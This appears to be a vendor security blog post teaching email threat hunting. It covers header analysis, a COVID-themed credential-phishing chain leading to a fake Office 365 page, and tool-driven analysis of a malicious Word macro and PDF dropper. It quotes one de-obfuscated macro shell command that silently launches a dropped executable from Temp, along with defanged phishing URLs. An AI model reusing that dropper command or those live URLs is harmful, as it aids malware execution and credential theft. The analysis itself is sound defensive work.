Introduction
Email is one of the primary ways of communication in the modern world. We use email to receive notifications about our online shopping, financial transaction, credit card e-statements, one-time passwords to authenticate registration processes, application for jobs, auditions, school admissions and many other purposes. Since many people around the globe depend on electronic mail to communicate, phishing emails are an attack method favored by cyber criminals.
In this type of attack, cyber criminals design emails to look convincing and send them to targeted people. The sender pretends to be someone the potential victim knows, someone who can be trusted, like a friend, or close contact, or the very bank where they save their income, or even the social media platform where they might have an account. As soon as they click on any malicious files or links embedded within these emails, they may land in a compromised situation.
Detailed Analysis
In this write up, I will focus on things to look at while hunting threats in phishing emails.
Header analysis:
An email is divided into three parts: header, body, and attachment. The header part keeps the routing information of the email. It may contain other information like content type, from, to, delivery date, sender origin, mail server, and the actual email address used to send/receive the email.
Important headers
Return- Path:
The Return-path email address receives the delivery status information. To get undelivered emails, or any other bounced back messages, our emails’ server uses Return-Path. The recipient server uses this field to identify spoof emails. In this process, the recipient server retrieves all the permitted IPs related to the sender domain and matches with the sender IP. If it fails to provide any match, we can consider the email to be spam.
Received:
This field shows information related to all hops, through which the email was transferred. The last entry shows the initial address of the email sender.
Reply-To:
This field’s email address is used to receive the reply message. It can differ from the address in spoof emails.
Received-SPF:
SPF (Sender Policy Framework) helps to verify that messages appearing from a particular domain were sent from servers under control of the actual owner. If the value is Pass, then the email source is valid.
DKIM:
Domain Keys Identified Mail (DKIM) signs the outgoing email with an encrypted signature inside the headers and the recipient email server decrypts it, using a shared public key to check whether the message was changed in transit.
X-Headers:
These headers are known as experimental or extension headers. They are usually added by the recipient mailbox providers. Fields like X-FOSE-Spam and X-Spam-Score are used to identify spam emails.
Consider the following email message:
Figure1: Raw email header information
- In the above example we notice the return path does not match with the from address, meaning any undelivered email will return to the return path email address.
- In the Received field, the domain name from where this email is sent is hiworks.co.kr (the email spoofing site) and not gki.com. This is clearly not legitimate. Even the IP (142.11.243.65) does not correspond to gki.com, as per the Whois lookup.
- The from email address is different from the Reply-To email address. This clearly implies that the actual reply will go to @gmail.com not to @gki.com
- The Received-SPF value is neutral; the domain gki.com neither permits nor denies the IP (142.11.243.65). On further confirmation with Whois lookup, we see that this domain does not belong to the IP (142.11.243.65).
- DKIM is none. This means the email is unsigned.
Based on the above information the email is suspected to be spoofed. We should put the extracted email IDs in the block list.
Email Body Analysis:
The email bodies of phishing emails we usually receive mostly target our trust, by having something faithful and reliable in their content. It is so personalized and seemingly genuine, that victim’s often take the bait. Let us see the example below and understand what actions should be taken in such a scenario.
Figure2: Phishing email related to COVID-19
In the above email, the spammer pretends to be a medical insurance service provider and this mail is regarding a health-plan payment invoice for COVID-19 insurance the victim has supposedly purchased recently.
Figure2: Phishing email related to COVID-19 (continued)
Moreover, if we look closely at the bottom of the email, we can see the message, ‘This email has been scanned by McAfee’. This makes the email appear believable, as well as trustworthy.
Now, if we hover the mouse pointer over the |SEE DETAILS| button, one OneDrive link will pop up. Rather than clicking on the link, we must copy it for execution separately.
Figure3: Downloaded html file after clicking on the OneDrive link.
To execute the above OneDrive link separately (hxxps://1drv[.]ms/u/s!Ajmzc7fpBw5lrzwfPwIkoZRelG4D), it would be preferable to load it inside an isolated environment. If you do not have such an environment available yourself, you can use an online browser service like Browserling.
After loading the link in the browser, you will notice that it downloads an html attachment. Clicking on the html file takes us to another webpage (hxxps://selimyildiz[.]com.tr/wp-includes/fonts/greec/xls/xls/open/index.htm).
Figure4: Fake Office 365 login page
The content of the site is a lookalike of an online Microsoft Excel document where it is asking for Office 365 login details to download it. Before doing anything here we need to check a few more things.
Figure5: WordPress admin panel of selimyildiz[.]com.tr
To further validate whether the webpage is genuine or not, I have shortened the URL to its domain level to load it. The domain leads to a WordPress login page which does not belong to Microsoft, further arousing suspicion.
Figure 6: whois information of selimyildiz[.]com.tr
As per the whois information This domain has not been registered by Microsoft and it resolves to the public IP 2.56.152.159 which is also not owned by Microsoft. The information clearly indicates that it is not a genuine website.
Figure7: Attempting to login with random credentials to validate the authentication
Now to check the behavior, I came back to the login page, enter some random credentials, and try to download the invoice. As expected, I was faced with a login failed error. Here on we can assume there might be two probable reasons for the login failure. Firstly, to make the victim believe that it is a genuine login page or, secondly, to confirm whether the typed password is correct, as the victim may have made a typing error.
Figure8: Fake invoice to lure the victim
Now that we know this is fake, what is next? To validate the authentication check I entered random credentials again and bingo! This time it redirects to a pdf invoice, which looks genuine by showing it belongs to some medical company. However, the sad part is if the victim falls under this trap then, by the time they realize that this is a fake invoice, their login credentials will be phished.
Email Attachment Analysis:
In email, users commonly share two types of documents as an attachment, Microsoft office documents or PDF files. These are often used in document-based malware campaigns. To exploit the targeted systems, attackers usually infect these documents using VBA or JavaScript and distribute them via (phishing) emails.
In the first section of this part, we will analyze a malicious Word document. This type of document contains malicious Visual Basic Application (VBA) code, known as macros. Sometimes, a macro triggers the moment a document is opened, but from Microsoft Office 2007 onwards, a macro cannot execute itself until and unless the user enables the macro content. To deal with such showstoppers, attackers utilize various social engineering methods, where the primary goal is to build trust with the victim so that they click on the ‘Enable Editing’ button without any second thought.
Word Document Analysis:
File Name: PR_Report.bin
Hash: e992ffe746b40d97baf56098e2110ff3978f8229ca333e87e24d1539cea7415c
Tools:
- Oletools
- Yara
- Didier Stevens Suite
- Process Monitor
- Windows Network Monitor (Packet capture tool)
Step 1: Getting started with File properties
It is always good practice to get familiar with the properties before starting any file analysis. We can get the details using the ‘file’ command in Linux.
- We have found the file is a “Microsoft Office Word file”
- Create Time/Date: Thu Jun 28 16:48:00 2018
- Last Saved Time: Thu Jun 28 16:54:00 2018
Step 2: Apply Yara rules
Yara is a tool to identify and classify malware. This tool is used to conduct signature-based detection against any file. Let us check a couple of premade Yara rules from Didier Stevens Suites.
- The above Yara rule (maldoc.yara) matches the OLE file magic number (D0 CF 11 E0) which is nothing but the HEX identifier (magic bytes) for Microsoft Office documents.
- It also detects a couple of suspicious imports inside the file like GetProcAddr and LoadLibrary.
- This Yara rule (contains_pe_file.yara) checks if a file has any PE file embedded. Based on that it matches the above strings from the file. MZ is a signature of a PE file.
Step 3: Dump the document contents using oledump.py
As we know, an OLE file contains streams of data. Oledump.py will help us to analyze those streams further to extract macros or objects out of it.
You may notice in the above figure that we can see two letters ‘M‘ and ‘O’ in stream 8, 9 and 15, respectively. Here ‘M’ indicates the stream might contain macro code and ‘O’ indicates an object.
Step 4: Extract the VB script in macros
- In stream 8, the code contains a method named as ‘killo’. This function saves the document with the same file name.
- In stream 9, the code provides lot of interesting information.
- In Document_Open() function we can find the file names like 5C.pif, 6C.pif where 5C.pif is copying into ‘6C.pif’ using FileCopy function.
- In the later part, the function is calling ‘killo’ method from the other module (Stream 8).
- In the end Document_Close() function executes a obfuscated command using shell. After de-obfuscation we see it executes 6C.pif in background (using vbHide method) and pings localhost all together.
Shell cmd.exe /c ping localhost -n 100 && start Environ(“Temp”) & “\6C.pif”, vbHide
Step 5: Extract file from the ole object.
It is clear that the document has an embedded file which can be extracted using the oleobj tool.
- As shown above, oleobj extracts the embedded file from the object and saves it inside the current working directory.
- The above highlighted part also provides details about the source path and temporary path where the file is going to save itself inside the victim’s system after execution of the document.
Step 6: Getting the static information from the extracted file.
- The above information shows us this is a PE32 executable for MS Windows.
- For confirmation, we can also run pecheck.py tool and find the PE headers inside the file.
Step 7: Behavior analysis
Setup a Windows 7 32-bit VM, change the file extension to ‘.exe’ and simply run Apate DNS and Windows Network Monitoring tool before execution.
Figure9: Command and Control domain’s DNS queries captured in Apate DNS
Figure10: Captured network traffic of 5C.exe while trying to communicate with the C2
- The results in Apate DNS and Microsoft Network Monitoring tool show the file has created a process name 5C.exe and repeatedly tried connecting to multiple C2 servers.
Figure11: Registry changes captured in Process Monitor
- Process Monitor tells us some modifications took place in the Registry keys of Internet Settings by 5C.exe. It disabled the IE browser proxy by setting the value of ProxyEnable to 0 and SavedLegacySettings sets the 9th byte value to “09”. It means the browser disabled the proxy and automatically detect the internet settings.
We can summarize it as the Word document first ran a VBA macro, dropped and ran an embedded executable, created a new process, communicated with the C2 servers and made unauthorized Registry changes. This is enough information to consider the document as malicious. From this point, if we want, we can do more detailed analysis like debugging the executable or analyzing the process dump to learn more about the file behavior.
PDF Document Analysis:
A PDF document can be defined as a collection of objects that describes how the pages should be displayed inside the file.
Usually, an attack vector uses email or other social engineering skills to lure the user to click or open the pdf document. The moment a user opens the pdf file it typically executes JavaScript in the background that may exploit the existing vulnerability that persist with the Adobe pdf reader or drop an executable as a payload that might perform the rest of the objectives.
A pdf file has four components. They are header, body, reference, and trailer.
- Header is the topmost part of the document. It shows information related to the version of the document.
- Body might contain various objects (Objects are made of streams. These streams are used to store the data).
- The cross-reference table points to each object.
- Trailer points to the cross-reference table.
File name: Report.pdf
Sha256: a7b423202d5879d1f9e47ae85ce255e3758c5c1e5b19fcd56691dab288a47b4c
Tools –
Step 1: Scan the pdf document with PDFiD
PDFiD is a part of the Didier Stevens Suite. It scans the pdf document with a list of strings, which helps you to identify the information like JavaScript, Embedded files, actions while opening the documents and the count of the occurrences of some specific strings inside the pdf file.
- According to the result shown above, PDFiD has identified the number of objects, streams, /JS, /JavaScript, OpenAction present inside the Report.pdf file. Here is some information about them.
- /JS, /Javascript or /RichMedia means Pdf document contains JavaScript or Flash media.
- /Embedded file indicates the presence of other file formats inside the pdf file.
- /OpenAction, AA, /Acroform tells us an automatic action should be executed when the pdf document is opened/viewed.
- Streams contain data inside an object.
Step 2: Looking inside the Objects
We have now discovered that there is JavaScript present inside the pdf file so let us start from there. We will run pdf-parser.py to search the JavaScript indirect object.
- The above result shows the JavaScript will launch the file ‘virus’ whenever the pdf is opened so, in the next step, we will extract the mentioned file from the pdf.
Step 3: Extract the embedded file using peepdf.
Peepdf is a tool built in Python, which provides all the necessary components in one place that are required during PDF analysis.
Syntax: peepdf –i file_name.pdf
The syntax (-i) means enabling interaction mode.
To learn more, just type help with the topic and explore the options it displays.
- The above result from peepdf indicates the embedded file is available in object number 14. Going inside object 14, we find it is pointed to object 15; similarly, object 15 is further pointed to object 16. Finally, we get a clue about the existence of the file ‘virus’ inside object 17. Usually, to avoid detection, attackers design documents like this. Now, if we look inside PDF version 1, there is only one stream available that is also pointed to 17. Seeing this, we come to know that object 17 is a stream and the file is available inside.
- Now inside stream 17, we get the file signature starting with MZ and hex value starting with 4d 5a, which indicates this is a PE executable file.
- Now save the stream as virus.exe and run file command for confirmation.
Step 4: Behavior analysis
Now set up a windows 7 32-bit virtual machine and execute the file.
Figure12: Process Explorer displays processes created by virus.exe
- As shown in Process Explorer, virus.exe created a couple of suspicious processes (zedeogm.exe, cmd.exe) and they were terminated after execution.
Figure13: Process Monitor captured the system changes made by virus.exe
The results in Process Monitor show the file was dropped as zedeogm.exe. Later it modified the Windows firewall rule. Then it executed WinMail.exe, following which it started cmd.exe to execute ‘tmpd849fc4d.bat’ and exited the process.
At this point, we have collected enough evidence to treat the pdf file as malicious. We can also perform additional precautionary steps like binary debugging and memory forensics on the extracted IOCs to hunt for further threats
Conclusion
In this write-up, we have understood the purpose of email threat hunting, how it will help to take preventive actions against un-known threats. We have discovered the areas we should investigate for hunting threats. We learned how a malicious URL can be hidden inside an email body and its analysis to further see if it is malicious or not.
To stay protected:
- Never trust the email sender. Always check the basic identity verification before responding to any email.
- Never click on any links or open any attachment if the email sender is not genuine.
- Attackers often use arbitrary domain names. So read the site address carefully to avoid the typo-squatting trap.
- Cross-check the website background before providing any personal information like name, address, login details, financial information etc.
- If you realize that you have already entered your credentials to any unauthorized sources please change your password immediately.
- Use McAfee Web Gateway or McAfee WebAdvisor to get maximum security against malicious URLs and IPs.
- For protection from drive-by downloads and real-time threats associated with email attachments, enabling McAfee Endpoint Security’s Suspicious Attachment detection is highly recommended.
- MVISION Unified Cloud Edge protects against Tactics Technique and Procedure (TTP) used by Advanced Persistent Threats.
- Suspicious links can be submitted to http://trustedsource.org to check the status and to submit for review.
- Suspicious files can be submitted to McAfee Labs